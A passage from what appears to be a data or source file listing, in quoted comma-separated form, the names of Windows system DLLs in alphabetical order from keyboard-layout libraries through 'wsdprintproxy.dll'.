"kbdhau.dll", "kbdhaw.dll", "kbdhe.dll", "kbdhe220.dll", "kbdhe319.dll", "kbdheb.dll", "kbdhebl3.dll", "kbdhela2.dll", "kbdhela3.dll", "kbdhept.dll", "kbdhu.dll", "kbdhu1.dll", "kbdibm02.dll", "kbdibo.dll", "kbdic.dll", "kbdinasa.dll", "kbdinbe1.dll", "kbdinbe2.dll", "kbdinben.dll", "kbdindev.dll", "kbdinen.dll", "kbdinguj.dll", "kbdinhin.dll", "kbdinkan.dll", "kbdinmal.dll", "kbdinmar.dll", "kbdinori.dll", "kbdinpun.dll", "kbdintam.dll", "kbdintel.dll", "kbdinuk2.dll", "kbdir.dll", "kbdit.dll", "kbdit142.dll", "kbdiulat.dll", "kbdjav.dll", "kbdjpn.dll", "kbdkaz.dll", "kbdkhmr.dll", "kbdkni.dll", "kbdkor.dll", "kbdkurd.dll", "kbdkyr.dll", "kbdla.dll", "kbdlao.dll", "kbdlisub.dll", "kbdlisus.dll", "kbdlk41a.dll", "kbdlt.dll", "kbdlt1.dll", "kbdlt2.dll", "kbdlv.dll", "kbdlv1.dll", "kbdlvst.dll", "kbdmac.dll", "kbdmacst.dll", "kbdmaori.dll", "kbdmlt47.dll", "kbdmlt48.dll", "kbdmon.dll", "kbdmonmo.dll", "kbdmonst.dll", "kbdmyan.dll", "kbdne.dll", "kbdnec.dll", "kbdnec95.dll", "kbdnecat.dll", "kbdnecnt.dll", "kbdnepr.dll", "kbdnko.dll", "kbdno.dll", "kbdno1.dll", "kbdnso.dll", "kbdntl.dll", "kbdogham.dll", "kbdolch.dll", "kbdoldit.dll", "kbdosa.dll", "kbdosm.dll", "kbdpash.dll", "kbdphags.dll", "kbdpl.dll", "kbdpl1.dll", "kbdpo.dll", "kbdro.dll", "kbdropr.dll", "kbdrost.dll", "kbdru.dll", "kbdru1.dll", "kbdrum.dll", "kbdsf.dll", "kbdsg.dll", "kbdsl.dll", "kbdsl1.dll", "kbdsmsfi.dll", "kbdsmsno.dll", "kbdsn1.dll", "kbdsora.dll", "kbdsorex.dll", "kbdsors1.dll", "kbdsorst.dll", "kbdsp.dll", "kbdsw.dll", "kbdsw09.dll", "kbdsyr1.dll", "kbdsyr2.dll", "kbdtaile.dll", "kbdtajik.dll", "kbdtam99.dll", "kbdtat.dll", "kbdth0.dll", "kbdth1.dll", "kbdth2.dll", "kbdth3.dll", "kbdtifi.dll", "kbdtifi2.dll", "kbdtiprc.dll", "kbdtiprd.dll", "kbdtt102.dll", "kbdtuf.dll", "kbdtuq.dll", "kbdturme.dll", "kbdtzm.dll", "kbdughr.dll", "kbdughr1.dll", "kbduk.dll", "kbdukx.dll", "kbdur.dll", "kbdur1.dll", "kbdurdu.dll", "kbdus.dll", "kbdusa.dll", "kbdusl.dll", "kbdusr.dll", "kbdusx.dll", 
"kbduzb.dll", "kbdvntc.dll", "kbdwol.dll", "kbdyak.dll", "kbdyba.dll", "kbdycc.dll", "kbdycl.dll", "kd.dll", "kdcom.dll", "kdcpw.dll", "kdhvcom.dll", "kdnet.dll", "kdnet_uart16550.dll", "kdscli.dll", "kdstub.dll", "kdusb.dll", "kd_02_10df.dll", "kd_02_10ec.dll", "kd_02_1137.dll", "kd_02_14e4.dll", "kd_02_15b3.dll", "kd_02_1969.dll", "kd_02_19a2.dll", "kd_02_1af4.dll", "kd_02_8086.dll", "kd_07_1415.dll", "kd_0c_8086.dll", "kerbclientshared.dll", "kerberos.dll", "kernel32.dll", "kernelbase.dll", "keycredmgr.dll", "keyiso.dll", "keymgr.dll", "knobscore.dll", "knobscsp.dll", "ksuser.dll", "ktmw32.dll", "l2gpstore.dll", "l2nacp.dll", "l2sechc.dll", "laprxy.dll", "legacynetux.dll", "lfsvc.dll", "libcrypto.dll", "licensemanager.dll", "licensingcsp.dll", "licensingdiagspp.dll", "licensingwinrt.dll", "licmgr10.dll", "linkinfo.dll", "lltdapi.dll", "lltdres.dll", "lltdsvc.dll", "lmhsvc.dll", "loadperf.dll", "localsec.dll", "localspl.dll", "localui.dll", "locationapi.dll", "lockappbroker.dll", "lockcontroller.dll", "lockscreendata.dll", "loghours.dll", "logoncli.dll", "logoncontroller.dll", "lpasvc.dll", "lpk.dll", "lsasrv.dll", "lscshostpolicy.dll", "lsm.dll", "lsmproxy.dll", "lstelemetry.dll", "luainstall.dll", "luiapi.dll", "lz32.dll", "magnification.dll", "maintenanceui.dll", "manageci.dll", "mapconfiguration.dll", "mapcontrolcore.dll", "mapgeocoder.dll", "mapi32.dll", "mapistub.dll", "maprouter.dll", "mapsbtsvc.dll", "mapsbtsvcproxy.dll", "mapscsp.dll", "mapsstore.dll", "mapstoasttask.dll", "mapsupdatetask.dll", "mbaeapi.dll", "mbaeapipublic.dll", "mbaexmlparser.dll", "mbmediamanager.dll", "mbsmsapi.dll", "mbussdapi.dll", "mccsengineshared.dll", "mccspal.dll", "mciavi32.dll", "mcicda.dll", "mciqtz32.dll", "mciseq.dll", "mciwave.dll", "mcrecvsrc.dll", "mdmcommon.dll", "mdmdiagnostics.dll", "mdminst.dll", "mdmmigrator.dll", "mdmregistration.dll", "memorydiagnostic.dll", "messagingservice.dll", "mf.dll", "mf3216.dll", "mfaacenc.dll", "mfasfsrcsnk.dll", "mfaudiocnv.dll", 
"mfc42.dll", "mfc42u.dll", "mfcaptureengine.dll", "mfcore.dll", "mfcsubs.dll", "mfds.dll", "mfdvdec.dll", "mferror.dll", "mfh263enc.dll", "mfh264enc.dll", "mfksproxy.dll", "mfmediaengine.dll", "mfmjpegdec.dll", "mfmkvsrcsnk.dll", "mfmp4srcsnk.dll", "mfmpeg2srcsnk.dll", "mfnetcore.dll", "mfnetsrc.dll", "mfperfhelper.dll", "mfplat.dll", "mfplay.dll", "mfps.dll", "mfreadwrite.dll", "mfsensorgroup.dll", "mfsrcsnk.dll", "mfsvr.dll", "mftranscode.dll", "mfvdsp.dll", "mfvfw.dll", "mfwmaaec.dll", "mgmtapi.dll", "mi.dll", "mibincodec.dll", "midimap.dll", "migisol.dll", "miguiresource.dll", "mimefilt.dll", "mimofcodec.dll", "minstoreevents.dll", "miracastinputmgr.dll", "miracastreceiver.dll", "mirrordrvcompat.dll", "mispace.dll", "mitigationclient.dll", "miutils.dll", "mlang.dll", "mmcbase.dll", "mmcndmgr.dll", "mmcshext.dll", "mmdevapi.dll", "mmgaclient.dll", "mmgaproxystub.dll", "mmres.dll", "mobilenetworking.dll", "modemui.dll", "modernexecserver.dll", "moricons.dll", "moshost.dll", "moshostclient.dll", "moshostcore.dll", "mosstorage.dll", "mp3dmod.dll", "mp43decd.dll", "mp4sdecd.dll", "mpeval.dll", "mpg4decd.dll", "mpr.dll", "mprapi.dll", "mprddm.dll", "mprdim.dll", "mprext.dll", "mprmsg.dll", "mpssvc.dll", "mpunits.dll", "mrmcorer.dll", "mrmdeploy.dll", "mrmindexer.dll", "mrt100.dll", "mrt_map.dll", "msaatext.dll", "msac3enc.dll", "msacm32.dll", "msafd.dll", "msajapi.dll", "msalacdecoder.dll", "msalacencoder.dll", "msamrnbdecoder.dll", "msamrnbencoder.dll", "msamrnbsink.dll", "msamrnbsource.dll", "msasn1.dll", "msauddecmft.dll", "msaudite.dll", "msauserext.dll", "mscandui.dll", "mscat32.dll", "msclmd.dll", "mscms.dll", "mscoree.dll", "mscorier.dll", "mscories.dll", "msctf.dll", "msctfmonitor.dll", "msctfp.dll", "msctfui.dll", "msctfuimanager.dll", "msdadiag.dll", "msdart.dll", "msdelta.dll", "msdmo.dll", "msdrm.dll", "msdtckrm.dll", "msdtclog.dll", "msdtcprx.dll", "msdtcspoffln.dll", "msdtctm.dll", "msdtcuiu.dll", "msdtcvsp1res.dll", "msfeeds.dll", "msfeedsbs.dll", 
"msflacdecoder.dll", "msflacencoder.dll", "msftedit.dll", "msheif.dll", "mshtml.dll", "mshtmldac.dll", "mshtmled.dll", "mshtmler.dll", "msi.dll", "msicofire.dll", "msidcrl40.dll", "msident.dll", "msidle.dll", "msidntld.dll", "msieftp.dll", "msihnd.dll", "msiltcfg.dll", "msimg32.dll", "msimsg.dll", "msimtf.dll", "msisip.dll", "msiso.dll", "msiwer.dll", "mskeyprotcli.dll", "mskeyprotect.dll", "msls31.dll", "msmpeg2adec.dll", "msmpeg2enc.dll", "msmpeg2vdec.dll", "msobjs.dll", "msoert2.dll", "msopusdecoder.dll", "mspatcha.dll", "mspatchc.dll", "msphotography.dll", "msports.dll", "msprivs.dll", "msrahc.dll", "msrating.dll", "msrawimage.dll", "msrdc.dll", "msrdpwebaccess.dll", "msrle32.dll", "msscntrs.dll", "mssecuser.dll", "mssign32.dll", "mssip32.dll", "mssitlb.dll", "mssph.dll", "mssprxy.dll", "mssrch.dll", "mssvp.dll", "mstask.dll", "mstextprediction.dll", "mstscax.dll", "msutb.dll", "msv1_0.dll", "msvcirt.dll", "msvcp110_win.dll", "msvcp120_clr0400.dll", "msvcp140_clr0400.dll", "msvcp60.dll", "msvcp_win.dll", "msvcr100_clr0400.dll", "msvcr120_clr0400.dll", "msvcrt.dll", "msvfw32.dll", "msvidc32.dll", "msvidctl.dll", "msvideodsp.dll", "msvp9dec.dll", "msvproc.dll", "msvpxenc.dll", "mswb7.dll", "mswebp.dll", "mswmdm.dll", "mswsock.dll", "msxml3.dll", "msxml3r.dll", "msxml6.dll", "msxml6r.dll", "msyuv.dll", "mtcmodel.dll", "mtf.dll", "mtfappserviceds.dll", "mtfdecoder.dll", "mtffuzzyds.dll", "mtfserver.dll", "mtfspellcheckds.dll", "mtxclu.dll", "mtxdm.dll", "mtxex.dll", "mtxoci.dll", "muifontsetup.dll", "mycomput.dll", "mydocs.dll", "napcrypt.dll", "napinsp.dll", "naturalauth.dll", "naturallanguage6.dll", "navshutdown.dll", "ncaapi.dll", "ncasvc.dll", "ncbservice.dll", "ncdautosetup.dll", "ncdprop.dll", "nci.dll", "ncobjapi.dll", "ncrypt.dll", "ncryptprov.dll", "ncryptsslp.dll", "ncsi.dll", "ncuprov.dll", "nddeapi.dll", "ndfapi.dll", "ndfetw.dll", "ndfhcdiscovery.dll", "ndishc.dll", "ndproxystub.dll", "nduprov.dll", "negoexts.dll", "netapi32.dll", "netbios.dll", 
"netcenter.dll", "netcfgx.dll", "netcorehc.dll", "netdiagfx.dll", "netdriverinstall.dll", "netevent.dll", "netfxperf.dll", "neth.dll", "netid.dll", "netiohlp.dll", "netjoin.dll", "netlogon.dll", "netman.dll", "netmsg.dll", "netplwiz.dll", "netprofm.dll", "netprofmsvc.dll", "netprovfw.dll", "netprovisionsp.dll", "netsetupapi.dll", "netsetupengine.dll", "netsetupshim.dll", "netsetupsvc.dll", "netshell.dll", "nettrace.dll", "netutils.dll", "networkexplorer.dll", "networkhelper.dll", "networkicon.dll", "networkproxycsp.dll", "networkstatus.dll", "networkuxbroker.dll", "newdev.dll", "nfcradiomedia.dll", "ngccredprov.dll", "ngcctnr.dll", "ngcctnrsvc.dll", "ngcisoctnr.dll", "ngckeyenum.dll", "ngcksp.dll", "ngclocal.dll", "ngcpopkeysrv.dll", "ngcprocsp.dll", "ngcrecovery.dll", "ngcsvc.dll", "ngctasks.dll", "ninput.dll", "nlaapi.dll", "nlahc.dll", "nlasvc.dll", "nlhtml.dll", "nlmgp.dll", "nlmproxy.dll", "nlmsprep.dll", "nlsbres.dll", "nlsdata0000.dll", "nlsdata0009.dll", "nlsdl.dll", "nlslexicons0009.dll", "nmadirect.dll", "normaliz.dll", "npmproxy.dll", "npsm.dll", "nrpsrv.dll", "nshhttp.dll", "nshipsec.dll", "nshwfp.dll", "nsi.dll", "nsisvc.dll", "ntasn1.dll", "ntdll.dll", "ntdsapi.dll", "ntlanman.dll", "ntlanui2.dll", "ntlmshared.dll", "ntmarta.dll", "ntprint.dll", "ntshrui.dll", "ntvdm64.dll", "objsel.dll", "occache.dll", "ocsetapi.dll", "odbc32.dll", "odbcbcp.dll", "odbcconf.dll", "odbccp32.dll", "odbccr32.dll", "odbccu32.dll", "odbcint.dll", "odbctrac.dll", "oemlicense.dll", "offfilt.dll", "officecsp.dll", "offlinelsa.dll", "offlinesam.dll", "offreg.dll", "ole32.dll", "oleacc.dll", "oleacchooks.dll", "oleaccrc.dll", "oleaut32.dll", "oledlg.dll", "oleprn.dll", "omadmagent.dll", "omadmapi.dll", "onebackuphandler.dll", "onex.dll", "onexui.dll", "opcservices.dll", "opengl32.dll", "ortcengine.dll", "osbaseln.dll", "osksupport.dll", "osuninst.dll", "p2p.dll", "p2pgraph.dll", "p2pnetsh.dll", "p2psvc.dll", "packager.dll", "panmap.dll", "pautoenr.dll", "pcacli.dll", 
"pcadm.dll", "pcaevts.dll", "pcasvc.dll", "pcaui.dll", "pcpksp.dll", "pcsvdevice.dll", "pcwum.dll", "pcwutl.dll", "pdh.dll", "pdhui.dll", "peerdist.dll", "peerdistad.dll", "peerdistcleaner.dll", "peerdistsh.dll", "peerdistsvc.dll", "peopleapis.dll", "peopleband.dll", "perceptiondevice.dll", "perfctrs.dll", "perfdisk.dll", "perfnet.dll", "perfos.dll", "perfproc.dll", "perfts.dll", "phoneom.dll", "phoneproviders.dll", "phoneservice.dll", "phoneserviceres.dll", "phoneutil.dll", "phoneutilres.dll", "photowiz.dll", "pickerplatform.dll", "pid.dll", "pidgenx.dll", "pifmgr.dll", "pimstore.dll", "pkeyhelper.dll", "pktmonapi.dll", "pku2u.dll", "pla.dll", "playlistfolder.dll", "playsndsrv.dll", "playtodevice.dll", "playtomanager.dll", "playtomenu.dll", "playtoreceiver.dll", "ploptin.dll", "pmcsnap.dll", "pngfilt.dll", "pnidui.dll", "pnpclean.dll", "pnppolicy.dll", "pnpts.dll", "pnpui.dll", "pnpxassoc.dll", "pnpxassocprx.dll", "pnrpauto.dll", "pnrphc.dll", "pnrpnsp.dll", "pnrpsvc.dll", "policymanager.dll", "polstore.dll", "posetup.dll", "posyncservices.dll", "pots.dll", "powercpl.dll", "powrprof.dll", "ppcsnap.dll", "prauthproviders.dll", "prflbmsg.dll", "printui.dll", "printwsdahost.dll", "prm0009.dll", "prncache.dll", "prnfldr.dll", "prnntfy.dll", "prntvpt.dll", "profapi.dll", "profext.dll", "profprov.dll", "profsvc.dll", "profsvcext.dll", "propsys.dll", "provcore.dll", "provdatastore.dll", "provdiagnostics.dll", "provengine.dll", "provhandlers.dll", "provisioningcsp.dll", "provmigrate.dll", "provops.dll", "provplugineng.dll", "provsysprep.dll", "provthrd.dll", "proximitycommon.dll", "proximityservice.dll", "prvdmofcomp.dll", "psapi.dll", "pshed.dll", "psisdecd.dll", "psmsrv.dll", "pstask.dll", "pstorec.dll", "ptpprov.dll", "puiapi.dll", "puiobj.dll", "pushtoinstall.dll", "pwlauncher.dll", "pwrshplugin.dll", "pwsso.dll", "qasf.dll", "qcap.dll", "qdv.dll", "qdvd.dll", "qedit.dll", "qedwipes.dll", "qmgr.dll", "query.dll", "quiethours.dll", "qwave.dll", "racengn.dll", 
"racpldlg.dll", "radardt.dll", "radarrs.dll", "radcui.dll", "rasadhlp.dll", "rasapi32.dll", "rasauto.dll", "raschap.dll", "raschapext.dll", "rasctrs.dll", "rascustom.dll", "rasdiag.dll", "rasdlg.dll", "rasgcw.dll", "rasman.dll", "rasmans.dll", "rasmbmgr.dll", "rasmediamanager.dll", "rasmm.dll", "rasmontr.dll", "rasplap.dll", "rasppp.dll", "rastapi.dll", "rastls.dll", "rastlsext.dll", "rdbui.dll", "rdpbase.dll", "rdpcfgex.dll", "rdpcore.dll", "rdpcorets.dll", "rdpencom.dll", "rdpendp.dll", "rdpnano.dll", "rdpsaps.dll", "rdpserverbase.dll", "rdpsharercom.dll", "rdpudd.dll", "rdpviewerax.dll", "rdsappxhelper.dll", "rdsdwmdr.dll", "rdvvmtransport.dll", "rdxservice.dll", "rdxtaskfactory.dll", "reagent.dll", "reagenttask.dll", "recovery.dll", "regapi.dll", "regctrl.dll", "regidle.dll", "regsvc.dll", "reguwpapi.dll", "reinfo.dll", "remotepg.dll", "remotewipecsp.dll", "reportingcsp.dll", "resampledmo.dll", "resbparser.dll", "reseteng.dll", "resetengine.dll", "resetengonline.dll", "resourcemapper.dll", "resutils.dll", "rgb9rast.dll", "riched20.dll", "riched32.dll", "rjvmdmconfig.dll", "rmapi.dll", "rmclient.dll", "rnr20.dll", "roamingsecurity.dll", "rometadata.dll", "rotmgr.dll", "rpcepmap.dll", "rpchttp.dll", "rpcns4.dll", "rpcnsh.dll", "rpcrt4.dll", "rpcrtremote.dll", "rpcss.dll", "rsaenh.dll", "rshx32.dll", "rstrtmgr.dll", "rtffilt.dll", "rtm.dll", "rtmediaframe.dll", "rtmmvrortc.dll", "rtutils.dll", "rtworkq.dll", "rulebasedds.dll", "samcli.dll", "samlib.dll", "samsrv.dll", "sas.dll", "sbe.dll", "sbeio.dll", "sberes.dll", "sbservicetrigger.dll", "scansetting.dll", "scardbi.dll", "scarddlg.dll", "scardsvr.dll", "scavengeui.dll", "scdeviceenum.dll", "scecli.dll", "scesrv.dll", "schannel.dll", "schedcli.dll", "schedsvc.dll", "scksp.dll", "scripto.dll", "scrobj.dll", "scrptadm.dll", "scrrun.dll", "sdcpl.dll", "sdds.dll", "sdengin2.dll", "sdfhost.dll", "sdhcinst.dll", "sdiageng.dll", "sdiagprv.dll", "sdiagschd.dll", "sdohlp.dll", "sdrsvc.dll", "sdshext.dll", 
"searchfolder.dll", "sechost.dll", "seclogon.dll", "secproc.dll", "secproc_isv.dll", "secproc_ssp.dll", "secproc_ssp_isv.dll", "secur32.dll", "security.dll", "semgrps.dll", "semgrsvc.dll", "sendmail.dll", "sens.dll", "sensapi.dll", "sensorsapi.dll", "sensorscpl.dll", "sensorservice.dll", "sensorsnativeapi.dll", "sensorsutilsv2.dll", "sensrsvc.dll", "serialui.dll", "servicinguapi.dll", "serwvdrv.dll", "sessenv.dll", "setbcdlocale.dll", "settingmonitor.dll", "settingsync.dll", "settingsynccore.dll", "setupapi.dll", "setupcl.dll", "setupcln.dll", "setupetw.dll", "sfc.dll", "sfc_os.dll", "sgrmenclave.dll", "shacct.dll", "shacctprofile.dll", "sharedpccsp.dll", "sharedrealitysvc.dll", "sharehost.dll", "sharemediacpl.dll", "shcore.dll", "shdocvw.dll", "shell32.dll", "shellstyle.dll", "shfolder.dll", "shgina.dll", "shimeng.dll", "shimgvw.dll", "shlwapi.dll", "shpafact.dll", "shsetup.dll", "shsvcs.dll", "shunimpl.dll", "shutdownext.dll", "shutdownux.dll", "shwebsvc.dll", "signdrv.dll", "simauth.dll", "simcfg.dll", "skci.dll", "slc.dll", "slcext.dll", "slwga.dll", "smartscreenps.dll", "smbhelperclass.dll", "smbwmiv2.dll", "smiengine.dll", "smphost.dll", "smsroutersvc.dll", "sndvolsso.dll", "snmpapi.dll", "socialapis.dll", "softkbd.dll", "softpub.dll", "sortwindows61.dll", "sortwindows62.dll", "spacebridge.dll", "spacecontrol.dll", "spatializerapo.dll", "spatialstore.dll", "spbcd.dll", "speechpal.dll", "spfileq.dll", "spinf.dll", "spmpm.dll", "spnet.dll", "spoolss.dll", "spopk.dll", "spp.dll", "sppc.dll", "sppcext.dll", "sppcomapi.dll", "sppcommdlg.dll", "sppinst.dll", "sppnp.dll", "sppobjs.dll", "sppwinob.dll", "sppwmi.dll", "spwinsat.dll", "spwizeng.dll", "spwizimg.dll", "spwizres.dll", "spwmp.dll", "sqlsrv32.dll", "sqmapi.dll", "srchadmin.dll", "srclient.dll", "srcore.dll", "srevents.dll", "srh.dll", "srhelper.dll", "srm.dll", "srmclient.dll", "srmlib.dll", "srmscan.dll", "srmshell.dll", "srmstormod.dll", "srmtrace.dll", "srm_ps.dll", "srpapi.dll", "srrstr.dll", 
"srumapi.dll", "srumsvc.dll", "srvcli.dll", "srvsvc.dll", "srwmi.dll", "sscore.dll", "sscoreext.dll", "ssdm.dll", "ssdpapi.dll", "ssdpsrv.dll", "sspicli.dll", "sspisrv.dll", "ssshim.dll", "sstpsvc.dll", "starttiledata.dll", "startupscan.dll", "stclient.dll", "sti.dll", "sti_ci.dll", "stobject.dll", "storageusage.dll", "storagewmi.dll", "storewuauth.dll", "storprop.dll", "storsvc.dll", "streamci.dll", "structuredquery.dll", "sud.dll", "svf.dll", "svsvc.dll", "swprv.dll", "sxproxy.dll", "sxs.dll", "sxshared.dll", "sxssrv.dll", "sxsstore.dll", "synccenter.dll", "synccontroller.dll", "synchostps.dll", "syncproxy.dll", "syncreg.dll", "syncres.dll", "syncsettings.dll", "syncutil.dll", "sysclass.dll", "sysfxui.dll", "sysmain.dll", "sysntfy.dll", "syssetup.dll", "systemcpl.dll", "t2embed.dll", "tabbtn.dll", "tabbtnex.dll", "tabsvc.dll", "tapi3.dll", "tapi32.dll", "tapilua.dll", "tapimigplugin.dll", "tapiperf.dll", "tapisrv.dll", "tapisysprep.dll", "tapiui.dll", "taskapis.dll", "taskbarcpl.dll", "taskcomp.dll", "taskschd.dll", "taskschdps.dll", "tbauth.dll", "tbs.dll", "tcbloader.dll", "tcpipcfg.dll", "tcpmib.dll", "tcpmon.dll", "tcpmonui.dll", "tdh.dll", "tdlmigration.dll", "tellib.dll", "termmgr.dll", "termsrv.dll", "tetheringclient.dll", "tetheringmgr.dll", "tetheringservice.dll", "tetheringstation.dll", "textshaping.dll", "themecpl.dll", "themeservice.dll", "themeui.dll", "threadpoolwinrt.dll", "thumbcache.dll", "timebrokerclient.dll", "timebrokerserver.dll", "timesync.dll", "timesynctask.dll", "tlscsp.dll", "tokenbinding.dll", "tokenbroker.dll", "tokenbrokerui.dll", "tpmcertresources.dll", "tpmcompc.dll", "tpmtasks.dll", "tpmvsc.dll", "tquery.dll", "traffic.dll", "transportdsa.dll", "trie.dll", "trkwks.dll", "tsbyuv.dll", "tscfgwmi.dll", "tserrredir.dll", "tsf3gip.dll", "tsgqec.dll", "tsmf.dll", "tspkg.dll", "tspubwmi.dll", "tssessionux.dll", "tssrvlic.dll", "tsworkspace.dll", "ttdloader.dll", "ttdplm.dll", "ttdrecord.dll", "ttdrecordcpu.dll", "ttlsauth.dll", 
"ttlscfg.dll", "ttlsext.dll", "tvratings.dll", "twext.dll", "twinapi.dll", "twinui.dll", "txflog.dll", "txfw32.dll", "tzautoupdate.dll", "tzres.dll", "tzsyncres.dll", "ubpm.dll", "ucmhc.dll", "ucrtbase.dll", "ucrtbase_clr0400.dll", "ucrtbase_enclave.dll", "udhisapi.dll", "udwm.dll", "ueficsp.dll", "uexfat.dll", "ufat.dll", "uiamanager.dll", "uianimation.dll", "uiautomationcore.dll", "uicom.dll", "uireng.dll", "uiribbon.dll", "uiribbonres.dll", "ulib.dll", "umb.dll", "umdmxfrm.dll", "umpdc.dll", "umpnpmgr.dll", "umpo-overrides.dll", "umpo.dll", "umpoext.dll", "umpowmi.dll", "umrdp.dll", "unattend.dll", "unenrollhook.dll", "unimdmat.dll", "uniplat.dll", "unistore.dll", "untfs.dll", "updateagent.dll", "updatecsp.dll", "updatepolicy.dll", "upnp.dll", "upnphost.dll", "upshared.dll", "urefs.dll", "urefsv1.dll", "ureg.dll", "url.dll", "urlmon.dll", "usbcapi.dll", "usbceip.dll", "usbmon.dll", "usbperf.dll", "usbpmapi.dll", "usbtask.dll", "usbui.dll", "user32.dll", "usercpl.dll", "userdataservice.dll", "userdatatimeutil.dll", "userenv.dll", "userinitext.dll", "usermgr.dll", "usermgrcli.dll", "usermgrproxy.dll", "usoapi.dll", "usocoreps.dll", "usosvc.dll", "usp10.dll", "ustprov.dll", "utcutil.dll", "utildll.dll", "uudf.dll", "uvcmodel.dll", "uwfcfgmgmt.dll", "uwfcsp.dll", "uwfservicingapi.dll", "uxinit.dll", "uxlib.dll", "uxlibres.dll", "uxtheme.dll", "vac.dll", "van.dll", "vault.dll", "vaultcds.dll", "vaultcli.dll", "vaultroaming.dll", "vaultsvc.dll", "vbsapi.dll", "vbscript.dll", "vbssysprep.dll", "vcardparser.dll", "vdsbas.dll", "vdsdyn.dll", "vdsutil.dll", "vdsvd.dll", "vds_ps.dll", "verifier.dll", "version.dll", "vertdll.dll", "vfuprov.dll", "vfwwdm32.dll", "vhfum.dll", "vid.dll", "videohandlers.dll", "vidreszr.dll", "virtdisk.dll", "vmbuspipe.dll", "vmdevicehost.dll", "vmictimeprovider.dll", "vmrdvcore.dll", "voiprt.dll", "vpnike.dll", "vpnikeapi.dll", "vpnsohdesktop.dll", "vpnv2csp.dll", "vscmgrps.dll", "vssapi.dll", "vsstrace.dll", "vss_ps.dll", "w32time.dll", 
"w32topl.dll", "waasassessment.dll", "waasmediccapsule.dll", "waasmedicps.dll", "waasmedicsvc.dll", "wabsyncprovider.dll", "walletproxy.dll", "walletservice.dll", "wavemsp.dll", "wbemcomn.dll", "wbiosrvc.dll", "wci.dll", "wcimage.dll", "wcmapi.dll", "wcmcsp.dll", "wcmsvc.dll", "wcnapi.dll", "wcncsvc.dll", "wcneapauthproxy.dll", "wcneappeerproxy.dll", "wcnnetsh.dll", "wcnwiz.dll", "wc_storage.dll", "wdc.dll", "wdi.dll", "wdigest.dll", "wdscore.dll", "webauthn.dll", "webcamui.dll", "webcheck.dll", "webclnt.dll", "webio.dll", "webservices.dll", "websocket.dll", "wecapi.dll", "wecsvc.dll", "wephostsvc.dll", "wer.dll", "werconcpl.dll", "wercplsupport.dll", "werenc.dll", "weretw.dll", "wersvc.dll", "werui.dll", "wevtapi.dll", "wevtfwd.dll", "wevtsvc.dll", "wfapigp.dll", "wfdprov.dll", "wfdsconmgr.dll", "wfdsconmgrsvc.dll", "wfhc.dll", "whealogr.dll", "whhelper.dll", "wiaaut.dll", "wiadefui.dll", "wiadss.dll", "wiarpc.dll", "wiascanprofiles.dll", "wiaservc.dll", "wiashext.dll", "wiatrace.dll", "wificloudstore.dll", "wificonfigsp.dll", "wifidisplay.dll", "wimgapi.dll", "win32spl.dll", "win32u.dll", "winbio.dll", "winbiodatamodel.dll", "winbioext.dll", "winbrand.dll", "wincorlib.dll", "wincredprovider.dll", "wincredui.dll", "windowmanagement.dll", "windowscodecs.dll", "windowscodecsext.dll", "windowscodecsraw.dll", "windowsiotcsp.dll", "windowslivelogin.dll", "winethc.dll", "winhttp.dll", "winhttpcom.dll", "winhvemulation.dll", "winhvplatform.dll", "wininet.dll", "wininetlui.dll", "wininitext.dll", "winipcfile.dll", "winipcsecproc.dll", "winipsec.dll", "winlangdb.dll", "winlogonext.dll", "winmde.dll", "winml.dll", "winmm.dll", "winmmbase.dll", "winmsipc.dll", "winnlsres.dll", "winnsi.dll", "winreagent.dll", "winrnr.dll", "winrscmd.dll", "winrsmgr.dll", "winrssrv.dll", "winrttracing.dll", "winsatapi.dll", "winscard.dll", "winsetupui.dll", "winshfhc.dll", "winsku.dll", "winsockhc.dll", "winsqlite3.dll", "winsrpc.dll", "winsrv.dll", "winsrvext.dll", "winsta.dll", 
"winsync.dll", "winsyncmetastore.dll", "winsyncproviders.dll", "wintrust.dll", "wintypes.dll", "winusb.dll", "wirednetworkcsp.dll", "wisp.dll", "wkscli.dll", "wkspbrokerax.dll", "wksprtps.dll", "wkssvc.dll", "wlanapi.dll", "wlancfg.dll", "wlanconn.dll", "wlandlg.dll", "wlangpui.dll", "wlanhc.dll", "wlanhlp.dll", "wlanmediamanager.dll", "wlanmm.dll", "wlanmsm.dll", "wlanpref.dll", "wlanradiomanager.dll", "wlansec.dll", "wlansvc.dll", "wlansvcpal.dll", "wlanui.dll", "wlanutil.dll", "wldap32.dll", "wldp.dll", "wlgpclnt.dll", "wlidcli.dll", "wlidcredprov.dll", "wlidfdp.dll", "wlidnsp.dll", "wlidprov.dll", "wlidres.dll", "wlidsvc.dll", "wmadmod.dll", "wmadmoe.dll", "wmalfxgfxdsp.dll", "wmasf.dll", "wmcodecdspps.dll", "wmdmlog.dll", "wmdmps.dll", "wmdrmsdk.dll", "wmerror.dll", "wmi.dll", "wmiclnt.dll", "wmicmiplugin.dll", "wmidcom.dll", "wmidx.dll", "wmiprop.dll", "wmitomi.dll", "wmnetmgr.dll", "wmp.dll", "wmpdui.dll", "wmpdxm.dll", "wmpeffects.dll", "wmphoto.dll", "wmploc.dll", "wmpps.dll", "wmpshell.dll", "wmsgapi.dll", "wmspdmod.dll", "wmspdmoe.dll", "wmvcore.dll", "wmvdecod.dll", "wmvdspa.dll", "wmvencod.dll", "wmvsdecd.dll", "wmvsencd.dll", "wmvxencd.dll", "woftasks.dll", "wofutil.dll", "wordbreakers.dll", "workfoldersgpext.dll", "workfoldersres.dll", "workfoldersshell.dll", "workfolderssvc.dll", "wosc.dll", "wow64.dll", "wow64cpu.dll", "wow64win.dll", "wpbcreds.dll", "wpc.dll", "wpcapi.dll", "wpcdesktopmonsvc.dll", "wpcproxystubs.dll", "wpcrefreshtask.dll", "wpcwebfilter.dll", "wpdbusenum.dll", "wpdshext.dll", "wpdshserviceobj.dll", "wpdsp.dll", "wpd_ci.dll", "wpnapps.dll", "wpnclient.dll", "wpncore.dll", "wpninprc.dll", "wpnprv.dll", "wpnservice.dll", "wpnsruprov.dll", "wpnuserservice.dll", "wpportinglibrary.dll", "wpprecorderum.dll", "wptaskscheduler.dll", "wpx.dll", "ws2help.dll", "ws2_32.dll", "wscapi.dll", "wscinterop.dll", "wscisvif.dll", "wsclient.dll", "wscproxystub.dll", "wscsvc.dll", "wsdapi.dll", "wsdchngr.dll", "wsdprintproxy.dll", 
